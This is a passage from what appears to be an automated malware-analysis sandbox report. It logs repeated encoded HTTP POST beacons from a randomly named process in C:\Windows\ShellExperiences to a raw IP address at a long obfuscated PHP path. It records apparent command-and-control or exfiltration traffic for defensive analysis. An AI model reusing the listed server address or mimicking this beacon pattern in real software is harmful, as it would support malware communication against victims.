    Data Ascii: \RFW[\SSX[WVP\[[UV^[T]Q^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B/!((2<6;9!+-#+$Z!7(+3#Y>?=%(Y':'_!/Y.
Jan 10, 2025 07:58:55.302866936 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:55.441432953 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:55 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50101 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:55.563723087 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:55.907960892 CET | 2544 | OUT | Data Raw: 59 5e 43 5f 5b 5a 56 52 58 5b 57 56 50 5e 5b 55 55 5c 5e 58 54 58 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: Y^C_[ZVRX[WVP^[UU\^XTXQ]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B.1/?%+;;<=$)(("4U*3+Z+?2=+$:'_!/Y.=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50102 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:56.164052963 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2036
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:56.517317057 CET | 2036 | OUT | Data Raw: 59 56 46 53 5e 59 56 50 58 5b 57 56 50 53 5b 52 55 53 5e 52 54 51 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YVFS^YVPX[WVPS[RUS^RTQQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'.!/?-_?<]/).+=/<;8Z6'+T(#+)?%%=8^''_!/Y.
Jan 10, 2025 07:58:59.940201998 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:00.072932005 CET | 349 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:59 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 39 38 0d 0a 0f 1e 3a 0f 34 02 3c 1f 25 2c 29 1c 3a 01 0b 56 2b 1e 24 59 29 03 2f 12 29 0d 2f 56 3a 01 05 57 36 05 0b 59 3c 22 22 51 27 05 3c 53 25 1d 21 59 0c 13 26 5b 28 2a 3d 1d 28 2a 0e 12 29 31 26 41 33 20 2b 5b 24 04 26 0b 37 3c 38 5a 3e 29 39 18 3f 08 31 10 2e 07 0d 04 29 3f 28 11 33 0c 2a 57 0c 1f 26 57 35 31 35 1e 35 0c 36 5c 27 01 28 0c 30 2b 20 1c 26 59 27 10 34 03 23 13 3a 00 3c 58 22 3d 34 11 29 2d 26 1f 23 32 2c 51 29 2c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 98:4<%,):V+$Y)/)/V:W6Y<""Q'<S%!Y&[(*=(*)1&A3 +[$&7<8Z>)9?1.)?(3*W&W51556\'(0+ &Y'4#:<X"=4)-&#2,Q), Q""P0]Q0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50103 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:56.284343958 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
    Connection: Keep-Alive
Jan 10, 2025 07:58:56.642354965 CET | 2544 | OUT | Data Raw: 5c 53 46 55 5e 5c 56 54 58 5b 57 56 50 58 5b 52 55 5d 5e 59 54 5c 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \SFU^\VTX[WVPX[RU]^YT\QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B,1+Z?"<6/;<#((8Z!/T(?Y)Y*2'''_!/Y.%
Jan 10, 2025 07:58:57.028199911 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:57.157007933 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:56 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50104 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:57.286503077 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:57.642225981 CET | 2544 | OUT | Data Raw: 5c 52 46 50 5e 5e 56 57 58 5b 57 56 50 5d 5b 54 55 5d 5e 5b 54 50 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: \RFP^^VWX[WVP][TU]^[TPQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'E,?<[-\?-:"<_(+ "$/U+0 *%-''_!/Y.1
Jan 10, 2025 07:58:58.039999008 CET | 225 | IN | HTTP/1.1 100 Continue
    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 36 3a 35 38 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 10 Jan 2025 06:58:57 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50105 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:58.168611050 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:58.517280102 CET | 2544 | OUT | Data Raw: 59 5e 43 50 5e 5b 53 52 58 5b 57 56 50 5d 5b 55 55 50 5e 5d 54 5c 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: Y^CP^[SRX[WVP][UUP^]T\QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;";?."?4Y/*>-<7"+(3^)=%,^$'_!/Y.1
Jan 10, 2025 07:58:58.905781031 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:58:59.040857077 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:58:58 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50106 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:58:59.176376104 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:58:59.533035994 CET | 2544 | OUT | Data Raw: 59 5f 46 54 5e 5b 56 5e 58 5b 57 56 50 5c 5b 51 55 51 5e 5f 54 50 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: Y_FT^[V^X[WVP\[QUQ^_TPQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';"?<=\<&Y,>?[?+((]54*0#>$-,&*'_!/Y.
Jan 10, 2025 07:58:59.979629040 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:00.130094051 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:59:00 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 50107 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe

Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:00.284984112 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
    Content-Type: application/octet-stream
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
    Host: 89.23.100.242
    Content-Length: 2544
    Expect: 100-continue
Jan 10, 2025 07:59:00.645905972 CET | 2544 | OUT | Data Raw: 59 57 43 52 5b 5b 56 54 58 5b 57 56 50 5e 5b 55 55 5c 5e 5d 54 59 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
    Data Ascii: YWCR[[VTX[WVP^[UU\^]TYQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,Y<[!]<\,*V(8](+ "* #>/.B$-+$:'_!/Y.=
Jan 10, 2025 07:59:01.049196959 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:01.204114914 CET | 200 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 10 Jan 2025 06:59:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
    Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 50108 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:01.342729092 CET | 507 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Jan 10, 2025 07:59:01.689182043 CET | 2544 | OUT | Data Raw: 5c 56 46 50 5b 5a 56 57 58 5b 57 56 50 53 5b 50 55 5d 5e 5e 54 5e 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \VFP[ZVWX[WVPS[PU]^^T^Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/+\<=Z<& /)-W>=]+5+ 3*<!%-(3'_!/Y.
Jan 10, 2025 07:59:02.188221931 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:02.320224047 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 50109 | 89.23.100.242 | 80 | 7860 | C:\Windows\ShellExperiences\uAsLgsGzSk.exe
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:02.498435020 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:59:02.845398903 CET | 2544 | OUT | Data Raw: 59 53 43 50 5e 58 53 50 58 5b 57 56 50 5d 5b 54 55 5d 5e 5f 54 5f 51 52 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YSCP^XSPX[WVP][TU]^_T_QRRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;1$?-]?6 ,*<>7<$X!+P+?^*<&C1-#0:'_!/Y.1
Jan 10, 2025 07:59:03.245507002 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:03.398781061 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
103 | 192.168.2.4 | 50110 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:03.516794920 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:59:03.861011028 CET | 2544 | OUT | Data Raw: 5c 53 43 51 5e 5c 53 57 58 5b 57 56 50 52 5b 53 55 5d 5e 5e 54 5e 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \SCQ^\SWX[WVPR[SU]^^T^Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,'<^?6;/*?[??;#6((#Z)61 $:'_!/Y.
Jan 10, 2025 07:59:04.257208109 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:04.385835886 CET | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=V@[0


Session ID | Source IP | Source Port | Destination IP | Destination Port
104 | 192.168.2.4 | 50111 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:04.526473999 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:59:04.876863956 CET | 2544 | OUT | Data Raw: 59 56 43 5f 5e 5c 56 52 58 5b 57 56 50 52 5b 52 55 51 5e 5c 54 5b 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: YVC_^\VRX[WVPR[RUQ^\T[Q_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR';1'[>.%_<6Z,&(>?)(4#$$?07^*5$=_''_!/Y.


Session ID | Source IP | Source Port | Destination IP | Destination Port
105 | 192.168.2.4 | 50112 | 89.23.100.242 | 80
Timestamp | Bytes transferred | Direction | Data
Jan 10, 2025 07:59:05.085773945 CET | 531 | OUT | POST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: 89.23.100.242
Content-Length: 2012
Expect: 100-continue
Connection: Keep-Alive
Jan 10, 2025 07:59:05.439104080 CET | 2012 | OUT | Data Raw: 5c 55 43 5e 5e 5c 56 54 58 5b 57 56 50 59 5b 56 55 50 5e 5d 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
Data Ascii: \UC^^\VTX[WVPY[VUP^]TPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'B/++>:?&-:*<.'<+("'*33_>?"F1-<$*'_!/Y.!
Jan 10, 2025 07:59:05.829966068 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 10, 2025 07:59:05.958870888 CET | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 10 Jan 2025 06:59:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
